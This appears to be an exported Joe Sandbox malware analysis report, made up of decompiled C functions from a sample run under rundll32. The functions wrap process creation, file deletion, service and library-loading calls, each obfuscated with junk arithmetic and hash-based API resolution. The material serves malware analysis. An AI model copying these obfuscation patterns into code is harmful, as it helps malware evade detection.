Associated: 00000009.00000002.2107516863.000000000048C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 01057ab686ecbff360e51a719133daa0d1e33e7dc0f508374df88d827497bc4e
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: CE018072A01108BFEB14DF95DC0A8DFBFB6EF48310F108089F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0047C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0047C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0047602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E004807A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0047c6e1
0x0047c6e6
0x0047c6f0
0x0047c6fc
0x0047c703
0x0047c706
0x0047c70d
0x0047c711
0x0047c715
0x0047c71c
0x0047c723
0x0047c72a
0x0047c731
0x0047c738
0x0047c751
0x0047c762
0x0047c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0047C762

Strings

/O, xrefs: 0047C6E6

Memory Dump Source

Source File: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.2107453809.0000000000470000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2107516863.000000000048C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 986af1678b0297b32ededa8b8b7e801df35f32cf88ddc638c3711dab361da0a5
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: B61133B290122DBBCB25DF95DD498DFBFB9EF04714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00471000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00471000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0047602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E004807A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00471006
0x00471009
0x0047100c
0x00471011
0x00471016
0x0047101d
0x00471026
0x0047102d
0x00471034
0x0047103b
0x00471047
0x0047104f
0x00471057
0x0047105e
0x00471065
0x0047106c
0x00471073
0x00471077
0x0047108b
0x00471096
0x0047109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00471096

Strings

[, xrefs: 0047103B

Memory Dump Source

Source File: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.2107453809.0000000000470000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2107516863.000000000048C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: f37083b01c8a3c4bbfc608e476ec31a5285325098407274ecf0257ed15031f87
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 11016DB6D0170CFFDF04DF94C94A5DEBBB1EF54318F108188E41466291D3B19B689B91

Uniqueness

Uniqueness Score: -1.00%

Function 00474859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00474859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E004807A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0047485e
0x0047487a
0x0047487d
0x00474884
0x0047488b
0x00474892
0x0047489d
0x004748a0
0x004748ad
0x004748b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 004748B7

Strings

[, xrefs: 0047488B

Memory Dump Source

Source File: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.2107453809.0000000000470000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2107516863.000000000048C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 8c66a9a4099f71adf00bd8d979d3b5bca4395a1c10c09f0fb849e86dab403ed2
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 6AF017B0A15209FBDB44CFE8CA5699EBFB9EB40305F20818DE444B7290E3B15F549B54

Uniqueness

Uniqueness Score: -1.00%

Function 00484F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00484F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0047602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E004807A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00484f80
0x00484f81
0x00484f82
0x00484f86
0x00484f87
0x00484f8c
0x00484fa5
0x00484fa8
0x00484faf
0x00484fb6
0x00484fc7
0x00484fca
0x00484fd7
0x00484fe2
0x00484fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00484FE2

Strings

{#lm, xrefs: 00484FC2

Memory Dump Source

Source File: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.2107453809.0000000000470000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2107516863.000000000048C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 570a2fd3e3bf645fbbba3b6bae40bd6c1106fc9d5c8719ce7dfdab5a0b6c920c
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 0DF037B081120CFFDB04EFA4DA4289EBFBAEB44304F20819DE808AB250D3715B549B54

Uniqueness

Uniqueness Score: -1.00%

Function 0048976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E0048976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0047602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E004807A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00489772
0x00489773
0x00489778
0x0048977a
0x0048977b
0x0048977e
0x0048977f
0x00489782
0x00489785
0x00489788
0x00489789
0x0048978c
0x0048978f
0x00489790
0x00489791
0x00489794
0x00489797
0x0048979a
0x0048979d
0x004897a0
0x004897a3
0x004897a6
0x004897a7
0x004897a8
0x004897ad
0x004897b7
0x004897c3
0x004897ca
0x004897d1
0x004897d8
0x004897df
0x004897e3
0x004897fc
0x00489816
0x0048981d

APIs

CreateProcessW.KERNEL32(0047591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0047591A), ref: 00489816

Memory Dump Source

Source File: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.2107453809.0000000000470000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2107516863.000000000048C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 69c8f59df3bac5bae13c6eef35ccb4d854d0c5c4faf13c5073b7263be74e65d7
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 6411D372801188BFDF199F92DC0ACDF7F3AEF89750F108048FA1452120D2768A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0047B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0047B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0047602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E004807A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0047b569
0x0047b56a
0x0047b56d
0x0047b572
0x0047b574
0x0047b577
0x0047b57a
0x0047b57d
0x0047b580
0x0047b583
0x0047b586
0x0047b587
0x0047b58a
0x0047b58d
0x0047b590
0x0047b593
0x0047b594
0x0047b595
0x0047b59a
0x0047b5a4
0x0047b5b8
0x0047b5c0
0x0047b5c4
0x0047b5cb
0x0047b5d2
0x0047b5d9
0x0047b5e6
0x0047b5fd
0x0047b604

APIs

CreateFileW.KERNELBASE(00480668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00480668,?,?,?,?), ref: 0047B5FD

Memory Dump Source

Source File: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.2107453809.0000000000470000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2107516863.000000000048C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 595c5e722c77d9c7d49d88daf91801ff734b81657db22119f4e36c63dd27aaed
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 8011F032801248BBDF16DF95DD06CEE7FBAFF89314F108198FA1862120D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0048981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0048981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0047602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E004807A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00489821
0x00489822
0x00489825
0x00489828
0x0048982a
0x0048982c
0x0048982f
0x00489832
0x00489835
0x00489836
0x00489837
0x0048983c
0x00489855
0x00489858
0x0048985f
0x00489866
0x0048986d
0x00489874
0x0048987b
0x0048988e
0x0048989b
0x004898a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,004787F2,0000CAAE,0000510C,AD82F196), ref: 0048989B

Memory Dump Source

Source File: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.2107453809.0000000000470000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2107516863.000000000048C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 925b112a742c1ec0aaf41e552268f7dc8b6d13034de9ecc19f808498cb29f730
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 00015A76801208FBDB04EFD5D846CDFBF79EF85750F10819DF918A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00487BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00487BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0047602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E004807A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00487bf7
0x00487bf8
0x00487bfa
0x00487bfd
0x00487bff
0x00487c02
0x00487c06
0x00487c07
0x00487c0f
0x00487c1d
0x00487c25
0x00487c2d
0x00487c31
0x00487c38
0x00487c3f
0x00487c46
0x00487c4a
0x00487c5e
0x00487c67
0x00487c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00487C67

Memory Dump Source

Source File: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.2107453809.0000000000470000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2107516863.000000000048C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: d1aba87aa279d100565bf5ac3e9383d10e5c199ac7644168272bb9bcb570ee8c
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 90014BB190120CFFEB09DFA4C94A8DEBBB9EF44314F208199F409A7240EAB15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 0047F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0047F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0047602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E004807A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0047f662
0x0047f663
0x0047f665
0x0047f668
0x0047f66a
0x0047f66d
0x0047f670
0x0047f673
0x0047f677
0x0047f678
0x0047f67d
0x0047f687
0x0047f693
0x0047f69a
0x0047f6a1
0x0047f6a5
0x0047f6a9
0x0047f6b0
0x0047f6c9
0x0047f6d8
0x0047f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0047F6D8

Memory Dump Source

Source File: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.2107453809.0000000000470000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2107516863.000000000048C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 33a4a690537b8e6046afb911b202e4070be49df70cdb03cc32ce0a4409f3ef51
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: F801E5B6901208BFEF05EF94DD068DF7F75EB05324F148188F90462250D6B65E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0047B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0047B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0047602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E004807A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0047b6f3
0x0047b6f8
0x0047b702
0x0047b70b
0x0047b712
0x0047b719
0x0047b720
0x0047b727
0x0047b72e
0x0047b747
0x0047b759
0x0047b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0047B759

Memory Dump Source

Source File: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.2107453809.0000000000470000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2107516863.000000000048C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 9668cf7f5cd416335d19fd80f584df5bd4a886a6a8aa1fcc68ff4ee5772d6810
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: A9012CB5941308FBEB45DF94DD06A9E7BB5EB18704F108188FA0966190D3B15A249B51

Uniqueness

Uniqueness Score: -1.00%

Function 0048AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0048AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0047602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E004807A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0048aa3f
0x0048aa40
0x0048aa41
0x0048aa44
0x0048aa47
0x0048aa4b
0x0048aa4c
0x0048aa51
0x0048aa5b
0x0048aa64
0x0048aa68
0x0048aa6f
0x0048aa76
0x0048aa8d
0x0048aa90
0x0048aa9d
0x0048aaa8
0x0048aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0048AAA8

Memory Dump Source

Source File: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.2107453809.0000000000470000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2107516863.000000000048C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: db47f84dfc0628458a0547069c130789d9a422af487dedcf98509de15b99c0cf
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 3FF069B590020CFFDF08EF94DD4A89EBFB5EB44304F10808CF805A6250D3B69B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 00475FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00475FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0047602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E004807A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00475fb5
0x00475fb6
0x00475fb7
0x00475fbb
0x00475fbc
0x00475fc1
0x00475fcb
0x00475fd7
0x00475fde
0x00475fe5
0x00475ffc
0x00475fff
0x00476006
0x0047600d
0x0047601a
0x00476025
0x0047602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00476025

Memory Dump Source

Source File: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.2107453809.0000000000470000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2107516863.000000000048C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: db7da3bf50b62e7e2fdacd88d0d1adb74cbbb413e7a89beab31db0f9759c88fc
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 8FF04FB4C11208FFDB48DFA0E94689EBFB9EB40300F20819CE409A7260E7755F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2808 Parent PID: 2708 rundll32.exeCOMMON

Executed Functions

Function 00232959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00232959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
